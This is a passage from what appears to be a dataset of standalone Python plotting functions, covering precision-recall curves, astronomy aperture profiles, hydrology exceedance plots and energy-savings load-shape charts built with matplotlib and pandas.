value].shape[0])/how_many\n for value in plotting_thres]\n\n pct_above = np.array(pct_above)\n mean_prec += interp(mean_pct_above, pct_above, plotting_prec)\n mean_rec += interp(mean_pct_above, pct_above, plotting_rec)\n\n #ax1.plot(pct_above, plotting_prec, 'b')\n #ax2.plot(pct_above, plotting_rec, 'r')\n\n mean_prec /= len(y_true)\n mean_rec /= len(y_true)\n\n mean_prec[-1] = np.mean([np.mean(enu) for enu in y_true])\n mean_rec[-1] = 1.0\n\n ax1.plot(mean_pct_above, mean_prec, 'b')\n ax2.plot(mean_pct_above, mean_rec, 'r')\n plt.title('Precision, Recall vs % Population')\n plt.savefig(img_dir+'PRATN_Curve_'+clf_name+'.png')", "def plot_apertures(image, ext=1):\n\n hdu = fits.open(image)\n apfile = './database/ape' + image.strip('.fits') + '_{:d}'.format(ext)\n\n b = np.array(\n [i.split()[3:] for i in open(apfile).readlines() if 'begin' in i])\n\n apid = b[:, 0]\n x = np.array([float(i) for i in b[:, 2]])\n\n sci_exts 
= np.array([i for i in range(len(hdu)) if hdu[i].name == 'SCI'])\n data = hdu[sci_exts[len(sci_exts)/2]].data\n\n profile = np.average(data, 1)\n\n fig = plt.figure(1)\n ax = fig.add_subplot(111)\n\n pmax = profile.max()\n\n ax.plot(np.arange(len(profile))+1, profile/pmax)\n ax.set_ylim(0, 1.1)\n\n for i, j in enumerate(apid):\n ax.annotate(j, xy=(x[i], 1), ha='center')\n ax.axvline(x[i], alpha=.3)\n\n plt.show()", "def initial_plots(runs):\n for run in runs.keys():\n meta = runs[run]\n plot_pdfs(meta)\n plot_priorsamps(meta)\n plot_ivals(meta)\n# if meta.truNz is not None:\n# plot_true(meta)\n timesaver(meta,'iplot',meta.key)", "def PlotEX(df, eom=None, show_plot=True):\n # Ensure 'Study' is in header.\n # TODO: Add code.\n # Obtain exceedence probabilities.\n if eom:\n df_excd = stats.AnnualExceedence(df, eom=eom)\n else:\n df_excd = stats.MonthlyExceedence(df)\n # Get list of variables.\n var_list = set(df_excd.columns.get_level_values('Part B'))\n # Determine number of axes in the figure.\n n_var = len(var_list)\n n_row = np.int(np.around(np.sqrt(n_var)))\n if n_row**2 >= n_var:\n n_col = n_row\n else:\n n_col = n_row + 1\n fig, ax = plt.subplots(nrows=n_row, ncols=n_col, figsize=(16, 9))\n # Remove extra axes, if necessary.\n if n_row * n_col != n_var:\n n_empty = n_row * n_col - n_var\n for k in range(n_empty):\n ax[-1, -(1+k)].remove()\n # Initialize variables for updating axes.\n cur_row = 0\n cur_col = 0\n # Plot each variable.\n for var in var_list:\n df_exc = df_excd.xs(var, level='Part B', axis=1)\n # Initialize parameters for current axis.\n y_min = np.min(df_exc.values)\n y_max = np.max(df_exc.values)\n col_var = df_exc.columns\n # Select current axis.\n if n_row == 1 and n_col == 1:\n ax_cur = ax\n elif n_row == 1:\n ax_cur = ax[cur_col]\n else:\n ax_cur = ax[cur_row, cur_col]\n # Plot study results for each variable.\n for c in col_var:\n sr_plot = df_exc[c]\n label_c = '{} {}'.format(*c[:2])\n ax_cur.plot(sr_plot, label=label_c, linewidth=1.0, alpha=0.7)\n # Set plot title.\n if eom:\n month_name = dt.date(1900, eom, 1).strftime('%B')\n temp_title = 'Exceedence Plot of {} (End of {})'\n ax_cur.set_title(temp_title.format(var, month_name))\n else:\n ax_cur.set_title('Exceedence Plot of {} (All Months)'.format(var))\n # Modify x-axis and y-axis.\n label_c = set(df_exc.columns.get_level_values('Part C'))\n _unit = df_exc.columns.get_level_values('Units')\n _dtyp = df_exc.columns.get_level_values('Data Type')\n unit_d = list(zip(_unit, _dtyp))\n combo_unit = [' '.join(i) for i in unit_d]\n label_u = set(combo_unit)\n ax_cur.set_ylabel('{} ({})'.format(r'/'.join(label_c),\n r'/'.join(label_u)))\n ax_cur.set_ylim(bottom=y_min, top=y_max)\n ax_cur.set_xlabel('Exceedance Probability')\n ax_cur.spines['right'].set_visible(False)\n ax_cur.spines['top'].set_visible(False)\n # Set legend.\n ax_cur.legend(title='Study, Part F')\n # Update current axis.\n cur_col += 1\n if cur_col >= n_col:\n cur_col = 0\n cur_row += 1\n # Adjust layout.\n plt.tight_layout()\n # Add figure notes.\n t = PlotChartNotes()\n if n_row * n_col != n_var:\n x_pos = (1 - n_empty / n_col) + 0.025\n y_pos = (1 / n_row) - 0.025\n plt.figtext(x_pos, y_pos, t, ha='left', va='top', wrap=True)\n else:\n plt.figtext(0.05, 0, t, ha='left', va='bottom', wrap=True)\n plt.subplots_adjust(bottom=0.2)\n # Show plot, if requested.\n if show_plot:\n plt.show()\n # Return figure and axes.\n return fig, ax", "def plot_ave(results_list):\n x_range = range(len(results_list[0]))\n err_x, err_y, std_list = [], [], []\n\n for i in 
x_range:\n if i % 10 == 0:\n #get average for each generation\n column = [] \n for result in results_list:\n column.append(result[i])\n average = np.average(column)\n \n std_dev = np.std(column)\n err_x.append(i)\n err_y.append(average)\n std_list.append(std_dev)\n\n pylab.errorbar(err_x, err_y, yerr=std_list)\n pylab.show()", "def plot_individual_tm(xdict, ydict, xprop, yprop, documents, spline):\n figure_array = {}\n for item in documents:\n xlabel = \"\\\\textbf{\" + label_dict[xprop] + \"}\"\n ylabel = \"\\\\textbf{\" + label_dict[yprop] + \"}\"\n print str(item[\"path_id\"])\n x = xdict[item[\"path_id\"]]\n y = ydict[item[\"path_id\"]]\n # fig_title = item[\"path_id\"] + \"(\" + item[\"pretty_formula\"] + \")\" # Individual traces\n fig_title = yprop + item[\"cation_type\"] # Plot by cation\n figure_array[item[\"path_id\"]] = plt.figure(fig_title, figsize=(6,6), dpi=plotting_dpi)\n ax = figure_array[item[\"path_id\"]].add_subplot(111)\n ax.scatter(x,y, s=70, zorder=2, color=tm_color_dict[item[\"tm_type\"][0]], linewidths=2.5, edgecolors='black',\n label=item[\"tm_type\"][0])\n if spline:\n tck = interpolate.splrep(x, y, s=0)\n xnew = np.arange(0, 100, 0.1)\n splfit = interpolate.splev(xnew, tck, der=0)\n x = xnew\n y = splfit\n if item[\"path_id\"][-3:] == \"002\":\n ax.plot(x, y, linewidth=2.5, zorder=1, color=tm_color_dict[item[\"tm_type\"][0]], linestyle='dashed')\n else:\n ax.plot(x, y, linewidth=2.5, zorder=1, color=tm_color_dict[item[\"tm_type\"][0]])\n ax.set_xlabel(xlabel, fontsize=24)\n # ax.set_ylim([0,1200])\n # ax.set_xlim([7,22])\n ax.set_ylabel(ylabel, fontsize=24)\n ax.tick_params(axis='x', labelsize=22)\n ax.tick_params(axis='y', labelsize=22)\n border_width = 2\n [i.set_linewidth(border_width) for i in ax.spines.itervalues()]\n plt.tight_layout()\n plt.legend(loc='best', prop={'size': 14})\n plt.rc('text', usetex=True)\n plt.rc('font', family='sans-serif')\n plt.tight_layout()\n plt.show()", "def plot_morphism_output(data, outdir):\n\n # show the distributions for each variable separately\n for col in data.columns:\n ProfilePlotter._plot_1d(data[col], outfile = os.path.join(outdir, col + \".pdf\"))\n\n # later, maybe also show 2d plots etc.", "def plot_p1(data, documentation):\r\n fig, ax = plt.subplots(1)\r\n data = process_data_p1(data)\r\n sns.lineplot(x=\"Academic Year\", y=\"MD_EARN_WNE_P10\", hue=\"CONTROL\",\r\n data=data, ax=ax,\r\n palette=sns.color_palette([\"#9b59b6\", \"#3498db\", \"#e74c3c\"]))\r\n fig.suptitle(\"Yearly Changes of Average Median Earnings of Former \" +\r\n \"Students per College Control Type\")\r\n ax.set(ylabel=\"Average Median Earnings ($)\")\r\n handles, legends = ax.get_legend_handles_labels()\r\n legends = replace_legend_value_mappings(legends, documentation)\r\n ax.legend(handles, legends, loc=\"lower left\")\r\n fig.savefig(join_curdir(\"results\", \"plot_p1.png\"))", "def analyze(data):\n # perform fit\n regr_results = sm.OLS.from_formula('mosquitos ~ temperature + rainfall', data).fit()\n print(regr_results.tvalues)\n \n fig = plt.figure(figsize=(6, 9))\n\n # plot predicted vs. measured mosquito populations from fitted model \n ax0 = fig.add_subplot(3, 1, 1)\n\n parameters = regr_results.params\n predicted = (parameters['Intercept'] + \n parameters['temperature'] * data['temperature'] + \n parameters['rainfall'] * data['rainfall'])\n\n ax0.plot(predicted, data['mosquitos'], 'gd')\n\n ax0.set_xlabel('predicted mosquito population')\n ax0.set_ylabel('measured mosquito population')\n \n # plot mosquitos vs. 
temperature\n ax1 = fig.add_subplot(3, 1, 2)\n\n ax1.plot(data['temperature'], data['mosquitos'], 'ro')\n ax1.set_xlabel('temperature')\n ax1.set_ylabel('mosquitos')\n\n # plot mosquitos vs. rainfall\n ax2 = fig.add_subplot(3, 1, 3)\n\n ax2.plot(data['rainfall'], data['mosquitos'], 'bs')\n ax2.set_xlabel('rainfall')\n ax2.set_ylabel('mosquitos')\n \n # adjust layout of axes according to label placement\n plt.tight_layout()\n \n return fig", "def avg_response(df, x, y_obs, y_est, save=False, show=True):\n\n fig, ax1 = plt.subplots(figsize=(15,15))\n\n ax2 = ax1.twinx()\n\n x_name = x\n if df[x].dtype == \"int\":\n x = df[x].astype(\"category\")\n elif df[x].dtype == \"float\":\n x = pd.cut(df[x], bins=10)\n\n metrics = {\"mean\":\"mean\", \"std err\":\"sem\", \"count\":\"count\"}\n df_grouped = df.groupby([x])[y_obs, y_est].agg(metrics)\n \n x_vals = range(len(df_grouped))\n y_vals = df_grouped[\"mean\"][y_est]\n ax1.errorbar(x_vals, y_vals,yerr=df_grouped[\"std err\"][y_est], fmt='-',\n marker='o',color=\"R\", mec='black', ms=10, mew=2, linewidth=4, \n capsize=10, elinewidth=2)\n\n y_vals = df_grouped[\"mean\"][y_obs]\n ax1.plot(x_vals, y_vals, '-', label=y_obs, marker='o',\n color = \"G\",mec='black', ms=10, mew=2, linewidth=4)\n\n y_vals = df_grouped[\"count\"][y_obs]\n ax2.bar(x_vals,y_vals, color='DarkSlateGray', alpha = 0.25)\n\n ax1.set_xlim(x_vals[0]-0.2,x_vals[-1]+1)\n x_levels = list(y_vals.index)\n plt.xticks(x_vals, x_levels)\n ax1.set_xticklabels(x_levels, rotation=45)\n ax1.grid(False)\n ax2.grid(False)\n font_size = 20\n ax1.set_xlabel(x_name, fontsize=font_size)\n ax1.set_ylabel(y_obs, fontsize=font_size)\n ax2.set_ylabel(\"count\", fontsize=font_size)\n plt.title(\"Average {y} for groups of {x}\".format(x=x_name, y=y_obs), \n fontsize=font_size+5)\n ax1.legend([y_obs, y_est], fontsize=font_size-2)\n if save:\n fig.savefig(\"/home/edward/work/repos/prometheus/python/plots/avg_response/{}.png\".\n format(x_name), bbox_inches='tight')\n if show:\n plt.show()", "def plot_data(X, y, X_pred, clf, title):\n \n figsize(10.2, 5.1)\n X2 = [[x] for x in linspace(0, max(X_pred)[0] * 1.15, 50)]\n days = clf.predict(X_pred)\n scatter(X, y, color='black')\n scatter(X_pred, days, color='red')\n plot(X2, clf.predict(X2), color='blue')\n \n i = 0\n len_data = len(X_pred)\n xytext = (5, -10)\n for data in zip(X_pred, days):\n i = i + 1\n dat = purchase_date + timedelta(int(round(data[1], 0)))\n\n annotate(dat.strftime('%b %d %Y'), xy=(data[0][0], data[1]), xycoords='data', xytext=xytext, textcoords='offset points')\n \n pylab.ylim([0, int(clf.predict(X2).max()) + 1])\n pylab.xlim([0, max(X2)[0]])\n ax=pylab.gca()\n ax.yaxis.set_major_formatter(NullFormatter())\n ax.yaxis.set_minor_formatter(NullFormatter())\n pylab.axes().set_xlabel('Miles')\n pylab.axes().set_ylabel('Time')\n pylab.axes().set_title(title)", "def plotPRC(yscore, true, datasets, title, outfile):\n \n fig = plt.figure()\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.0])\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.title(title)\n \n for i in range(len(datasets)):\n precision, recall, _ = precision_recall_curve(true[i], yscore[i][:,1])\n prc_auc = average_precision_score(true[i], yscore[i][:,1])\n plt.plot(recall, precision, label=datasets[i]+' (area = %0.2f)' % (prc_auc),linewidth=1)\n \n plt.legend(loc=\"lower right\")\n \n pdfplot = PdfPages(outfile);\n pdfplot.savefig(fig)\n pdfplot.close()", "def plotFittingResults(self):\n _listFitQ = [tmp.getValue() for tmp in self.getDataOutput().getScatteringFitQ()]\n _listFitValues 
= [tmp.getValue() for tmp in self.getDataOutput().getScatteringFitValues()]\n _listExpQ = [tmp.getValue() for tmp in self.getDataInput().getExperimentalDataQ()]\n _listExpValues = [tmp.getValue() for tmp in self.getDataInput().getExperimentalDataValues()]\n\n #_listExpStdDev = None\n #if self.getDataInput().getExperimentalDataStdDev():\n # _listExpStdDev = [tmp.getValue() for tmp in self.getDataInput().getExperimentalDataStdDev()]\n #if _listExpStdDev:\n # pylab.errorbar(_listExpQ, _listExpValues, yerr=_listExpStdDev, linestyle='None', marker='o', markersize=1, label=\"Experimental Data\")\n # pylab.gca().set_yscale(\"log\", nonposy='clip')\n #else: \n # pylab.semilogy(_listExpQ, _listExpValues, linestyle='None', marker='o', markersize=5, label=\"Experimental Data\")\n\n pylab.semilogy(_listExpQ, _listExpValues, linestyle='None', marker='o', markersize=5, label=\"Experimental Data\")\n pylab.semilogy(_listFitQ, _listFitValues, label=\"Fitting curve\")\n pylab.xlabel('q')\n pylab.ylabel('I(q)')\n pylab.suptitle(\"RMax : %3.2f. Fit quality : %1.3f\" % (self.getDataInput().getRMax().getValue(), self.getDataOutput().getFitQuality().getValue()))\n pylab.legend()\n pylab.savefig(os.path.join(self.getWorkingDirectory(), \"gnomFittingResults.png\"))\n pylab.clf()", "def plotResults(results):\n e = results['eclean'] - results['eCTI']\n e1 = results['e1clean'] - results['e1CTI']\n e2 = results['e2clean'] - results['e2CTI']\n\n print 'Delta e, e_1, e_2:', np.mean(e), np.mean(e1), np.mean(e2)\n print 'std e, e_1, e_2:', np.std(e), np.std(e1), np.std(e2)\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.hist(e, bins=15, label='$e$', alpha=0.5)\n ax.hist(e1, bins=15, label='$e_{2}$', alpha=0.5)\n ax.hist(e2, bins=15, label='$e_{1}$', alpha=0.5)\n ax.set_xlabel(r'$\\delta e$ [no CTI - CDM03 corrected]')\n plt.legend(shadow=True, fancybox=True)\n plt.savefig('ellipticityDelta.pdf')\n plt.close()\n\n r2 = (results['R2clean'] - results['R2CTI'])/results['R2clean']\n print 'delta R2 / R2: mean, std ', np.mean(r2), np.std(r2)\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.hist(r2, bins=15, label='$R^{2}$')\n ax.set_xlabel(r'$\\frac{\\delta R^{2}}{R^{2}_{ref}}$ [no CTI - CDM03 corrected]')\n plt.legend(shadow=True, fancybox=True)\n plt.savefig('sizeDelta.pdf')\n plt.close()", "def plot_results(outputs_table_totals, elec_benefits, gas_benefits):\n summer_months = [6, 7, 8, 9]\n shoulder_months = [3, 4, 5, 10]\n winter_months = [11, 12, 1, 2]\n peak_hours = [16, 17, 18, 19, 20]\n pct_hours_in_summer = 2928 / 8760\n pct_hours_in_shoulder = 2952 / 8760\n pct_hours_in_winter = 2880 / 8760\n\n trc_costs_record = outputs_table_totals[\"TRC Costs ($)\"]\n pac_costs_record = outputs_table_totals[\"PAC Costs ($)\"]\n trc_record = outputs_table_totals[\"TRC\"]\n pac_record = outputs_table_totals[\"PAC\"]\n lifecycle_net_mwh = outputs_table_totals[\"Electricity Lifecycle Net Savings (MWh)\"]\n lifecycle_net_therms = outputs_table_totals[\"Gas Lifecycle Net Savings (Therms)\"]\n lifecycle_net_ghg = outputs_table_totals[\"Total Lifecycle GHG Savings (Tons)\"]\n\n # Getting variables for plots\n elec_benefits_cols = (\n [\"hourly_savings\"] + ACC_COMPONENTS_ELECTRICITY + [\"av_csts_levelized\"]\n )\n\n elec_benefits_hour_month_year = (\n elec_benefits.groupby([\"hour_of_day\", \"year\", \"month\"])\n .agg(\n {\n **{component: \"sum\" for component in ACC_COMPONENTS_ELECTRICITY},\n **{\n \"hourly_savings\": \"sum\",\n \"marginal_ghg\": \"sum\",\n \"av_csts_levelized\": \"mean\",\n },\n }\n )\n .reset_index()\n 
)\n\n total_benefits = list(\n elec_benefits_hour_month_year.groupby([\"hour_of_day\"])[\"total\"].sum()\n )\n\n summer_benefits = list(\n elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(summer_months))\n ]\n .groupby([\"hour_of_day\"])[\"total\"]\n .sum()\n )\n summer_peak_benefits = elec_benefits_hour_month_year[\"total\"][\n (elec_benefits_hour_month_year[\"month\"].isin(summer_months))\n & (elec_benefits_hour_month_year[\"hour_of_day\"].isin(peak_hours))\n ].sum()\n shoulder_benefits = list(\n elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(shoulder_months))\n ]\n .groupby([\"hour_of_day\"])[\"total\"]\n .sum()\n )\n winter_benefits = list(\n elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(winter_months))\n ]\n .groupby([\"hour_of_day\"])[\"total\"]\n .sum()\n )\n total_savings = list(\n elec_benefits_hour_month_year.groupby([\"hour_of_day\"])[\"hourly_savings\"].sum()\n )\n summer_savings = list(\n elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(summer_months))\n ]\n .groupby([\"hour_of_day\"])[\"hourly_savings\"]\n .sum()\n )\n shoulder_savings = list(\n elec_benefits_hour_month_year[\n ((elec_benefits_hour_month_year[\"month\"].isin(shoulder_months)))\n ]\n .groupby([\"hour_of_day\"])[\"hourly_savings\"]\n .sum()\n )\n summer_peak_savings = elec_benefits_hour_month_year[\"hourly_savings\"][\n (elec_benefits_hour_month_year[\"month\"].isin(summer_months))\n & (elec_benefits_hour_month_year[\"hour_of_day\"].isin(peak_hours))\n ].sum()\n winter_savings = list(\n elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(winter_months))\n ]\n .groupby([\"hour_of_day\"])[\"hourly_savings\"]\n .sum()\n )\n total_av_csts_avg = list(\n elec_benefits_hour_month_year.groupby([\"hour_of_day\"])[\n \"av_csts_levelized\"\n ].mean()\n )\n summer_av_csts_avg = list(\n pct_hours_in_summer\n * elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(summer_months))\n ]\n .groupby([\"hour_of_day\"])[\"av_csts_levelized\"]\n .mean()\n )\n summer_peak_av_csts_avg = elec_benefits_hour_month_year[\"av_csts_levelized\"][\n (elec_benefits_hour_month_year[\"month\"].isin(summer_months))\n & (elec_benefits_hour_month_year[\"hour_of_day\"].isin(peak_hours))\n ].mean()\n shoulder_av_csts_avg = list(\n pct_hours_in_shoulder\n * elec_benefits_hour_month_year[\n ((elec_benefits_hour_month_year[\"month\"].isin(shoulder_months)))\n ]\n .groupby([\"hour_of_day\"])[\"av_csts_levelized\"]\n .mean()\n )\n winter_av_csts_avg = list(\n pct_hours_in_winter\n * elec_benefits_hour_month_year[\n (elec_benefits_hour_month_year[\"month\"].isin(winter_months))\n ]\n .groupby([\"hour_of_day\"])[\"av_csts_levelized\"]\n .mean()\n )\n\n elec_benefits_sum_by_hod = (\n elec_benefits[elec_benefits_cols].groupby(elec_benefits[\"hour_of_day\"]).sum()\n )\n elec_benefits_hoy = (\n elec_benefits[elec_benefits_cols]\n .groupby(elec_benefits[\"hour_of_year\"])\n .sum()\n .cumsum()\n .reset_index()\n )\n sav_avcsts_288 = (\n elec_benefits.groupby([\"hour_of_day\", \"month\"])\n .agg(\n {\n **{component: \"sum\" for component in ACC_COMPONENTS_ELECTRICITY},\n **{\n \"hourly_savings\": \"sum\",\n \"marginal_ghg\": \"sum\",\n \"av_csts_levelized\": \"mean\",\n },\n }\n )\n .reset_index()\n )\n sav_avcsts_288 = sav_avcsts_288[\n [\"hour_of_day\", \"month\", \"hourly_savings\", \"total\", \"marginal_ghg\"]\n ]\n ghgsav = sav_avcsts_288.pivot(\"hour_of_day\", \"month\", 
\"marginal_ghg\")\n sav = sav_avcsts_288.pivot(\"hour_of_day\", \"month\", \"hourly_savings\")\n avcsts = sav_avcsts_288.pivot(\"hour_of_day\", \"month\", \"total\")\n\n # savings load shape plot\n fig0, (ax1, ax2, ax3) = plt.subplots(\n 1, 3, figsize=(18, 5), sharex=True, sharey=True\n )\n plt.subplots_adjust(wspace=0, hspace=0)\n axs = [ax1, ax2, ax3]\n hod = elec_benefits_sum_by_hod.index\n legend_labels1 = [\"Summer\"]\n legend_labels2 = [\"Shoulder\"]\n legend_labels3 = [\"Winter\"]\n\n ax1.plot(\n hod,\n summer_savings,\n c=\"firebrick\",\n linewidth=5,\n marker=\"$\\u25EF$\",\n markersize=13,\n linestyle=\"-\",\n )\n ax2.plot(\n hod,\n shoulder_savings,\n c=\"royalblue\",\n linewidth=5,\n marker=\"$\\u2206$\",\n markersize=13,\n linestyle=\"-\",\n )\n ax3.plot(\n hod,\n winter_savings,\n c=\"green\",\n linewidth=5,\n marker=\"$\\u25A1$\",\n markersize=13,\n linestyle=\"-\",\n )\n ax1.axhline(y=0, color=\"gray\", linewidth=1, linestyle=\"--\")\n ax2.axhline(y=0, color=\"gray\", linewidth=1, linestyle=\"--\")\n ax3.axhline(y=0, color=\"gray\", linewidth=1, linestyle=\"--\")\n # Shade peak region\n ax1.axvspan(16, 21, alpha=0.2, color=\"grey\")\n\n leg1 = ax1.legend(legend_labels1, fontsize=14, loc=\"upper left\", frameon=False)\n for line, text in zip(leg1.get_lines(), leg1.get_texts()):\n text.set_color(line.get_color())\n leg2 = ax2.legend(legend_labels2, fontsize=14, loc=\"upper left\", frameon=False)\n for line, text in zip(leg2.get_lines(), leg2.get_texts()):\n text.set_color(line.get_color())\n leg3 = ax3.legend(legend_labels3, fontsize=14, loc=\"upper left\", frameon=False)\n for line, text in zip(leg3.get_lines(), leg3.get_texts()):\n text.set_color(line.get_color())\n\n ax1.set_ylabel(\"Savings (MWh/hr)\", size=16)\n ax2.set_xlabel(\"Hour of Day\", size=16)\n\n if max(summer_savings + shoulder_savings + winter_savings) < 0:\n ymax = 0\n else:\n ymax = max(summer_savings + shoulder_savings + winter_savings)\n if min(summer_savings + shoulder_savings + winter_savings) > 0:\n ymin = 0\n else:\n ymin = min(summer_savings + shoulder_savings + winter_savings)\n\n # Tick and lebel parameters\n ax1.set_ylim(ymin * 1.08, ymax * 1.08)\n ax1.set_yticks(\n np.arange(\n ymin * 1.08,\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax2.set_yticks(\n np.arange(\n ymin * 1.08,\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax3.set_yticks(\n np.arange(\n ymin * 1.08,\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax1.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax2.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax3.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax1.yaxis.set_minor_locator(AutoMinorLocator())\n ax1.set_xticks(np.arange(0, 24, step=4))\n ax1.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=7, width=2, labelsize=14\n )\n ax1.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax1.xaxis.set_minor_locator(AutoMinorLocator())\n ax2.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=7, width=2, labelsize=14\n )\n ax2.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax2.xaxis.set_minor_locator(AutoMinorLocator())\n ax3.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=7, width=2, labelsize=14\n )\n 
ax3.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax3.xaxis.set_minor_locator(AutoMinorLocator())\n\n # Set plot title, size, and position\n ax1.set_title(\"Seasonal Savings Load Shapes\", size=18, loc=\"left\").set_position(\n [0, 1.03]\n )\n\n # benefits_seasonal_shape_plot\n fig1, (ax1, ax2, ax3) = plt.subplots(\n 1, 3, figsize=(18, 5), sharex=True, sharey=True\n )\n plt.subplots_adjust(wspace=0, hspace=0)\n axs = [ax1, ax2, ax3]\n hod = elec_benefits_sum_by_hod.index\n legend_labels1 = [\"Summer\"]\n legend_labels2 = [\"Shoulder\"]\n legend_labels3 = [\"Winter\"]\n\n ax1.plot(\n hod,\n summer_benefits,\n c=\"firebrick\",\n linewidth=5,\n marker=\"$\\u2B24$\",\n markersize=13,\n linestyle=\":\",\n )\n ax2.plot(\n hod,\n shoulder_benefits,\n c=\"royalblue\",\n linewidth=5,\n marker=\"$\\u25B2$\",\n markersize=13,\n linestyle=\":\",\n )\n ax3.plot(\n hod,\n winter_benefits,\n c=\"green\",\n linewidth=5,\n marker=\"$\\u25A0$\",\n markersize=13,\n linestyle=\":\",\n )\n ax1.axhline(y=0, color=\"gray\", linewidth=1, linestyle=\"--\")\n ax2.axhline(y=0, color=\"gray\", linewidth=1, linestyle=\"--\")\n ax3.axhline(y=0, color=\"gray\", linewidth=1, linestyle=\"--\")\n # Shade peak region\n ax1.axvspan(16, 21, alpha=0.2, color=\"grey\")\n\n leg1 = ax1.legend(legend_labels1, fontsize=15, loc=\"upper left\", frameon=False)\n for line, text in zip(leg1.get_lines(), leg1.get_texts()):\n text.set_color(line.get_color())\n leg2 = ax2.legend(legend_labels2, fontsize=15, loc=\"upper left\", frameon=False)\n for line, text in zip(leg2.get_lines(), leg2.get_texts()):\n text.set_color(line.get_color())\n leg3 = ax3.legend(legend_labels3, fontsize=15, loc=\"upper left\", frameon=False)\n for line, text in zip(leg3.get_lines(), leg3.get_texts()):\n text.set_color(line.get_color())\n\n ax1.set_ylabel(\"TRC Benefits ($/hr)\", size=16)\n ax2.set_xlabel(\"Hour of Day\", size=16)\n\n if max(summer_benefits + shoulder_benefits + winter_benefits) < 0:\n ymax = 0\n else:\n ymax = max(summer_benefits + shoulder_benefits + winter_benefits)\n if min(summer_benefits + shoulder_benefits + winter_benefits) > 0:\n ymin = 0\n else:\n ymin = min(summer_benefits + shoulder_benefits + winter_benefits)\n\n # Tick and label parameters\n ax1.set_ylim(ymin * 1.08, ymax * 1.08)\n ax1.set_yticks(\n np.arange(\n ymin * 1.08,\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax2.set_yticks(\n np.arange(\n ymin * 1.08,\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax3.set_yticks(\n np.arange(\n ymin * 1.08,\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax1.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax2.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax3.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax1.yaxis.set_minor_locator(AutoMinorLocator())\n ax1.set_xticks(np.arange(0, 24, step=4))\n ax1.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=7, width=2, labelsize=14\n )\n ax1.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax1.xaxis.set_minor_locator(AutoMinorLocator())\n ax2.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=7, width=2, labelsize=14\n )\n ax2.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n 
ax2.xaxis.set_minor_locator(AutoMinorLocator())\n ax3.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=7, width=2, labelsize=14\n )\n ax3.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax3.xaxis.set_minor_locator(AutoMinorLocator())\n\n # Set plot title, size, and position\n ax1.set_title(\n \"Seasonal TRC Benefits by Hour ($)\", size=18, loc=\"left\"\n ).set_position([0, 1.03])\n\n # sum_hourly_plot\n fig2 = plt.figure(figsize=(12, 7), dpi=250)\n ax = fig2.gca()\n colors = [\n \"royalblue\",\n \"black\",\n \"pink\",\n \"firebrick\",\n \"gray\",\n \"darkviolet\",\n \"darkorange\",\n \"green\",\n \"saddlebrown\",\n ]\n legend_labels = []\n x = 1\n while x <= len(ACC_COMPONENTS_ELECTRICITY[1:]):\n if x == 1:\n ax.bar(\n hod,\n elec_benefits_sum_by_hod[ACC_COMPONENTS_ELECTRICITY[x]],\n color=colors[x - 1],\n )\n legend_labels.append(\n re.findall(\n \".*Name: (.*),\",\n str(elec_benefits_sum_by_hod[ACC_COMPONENTS_ELECTRICITY[x]]),\n )[0]\n )\n x += 1\n else:\n ax.bar(\n hod,\n elec_benefits_sum_by_hod[ACC_COMPONENTS_ELECTRICITY[x]],\n bottom=elec_benefits_sum_by_hod.iloc[:, 2 : x + 1].sum(axis=1),\n color=colors[x - 1],\n )\n legend_labels.append(\n re.findall(\n \".*Name: (.*),\",\n str(elec_benefits_sum_by_hod[ACC_COMPONENTS_ELECTRICITY[x]]),\n )[0]\n )\n x += 1\n\n # Set x and y limits based on min and max values\n ymax = elec_benefits_sum_by_hod.iloc[:, 2:x].sum(axis=1).max()\n if elec_benefits_sum_by_hod.iloc[:, 2:x].sum(axis=1).min() > 0:\n ymin = 0\n else:\n ymin = elec_benefits_sum_by_hod.iloc[:, 2:x].sum(axis=1).min()\n\n ax.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n 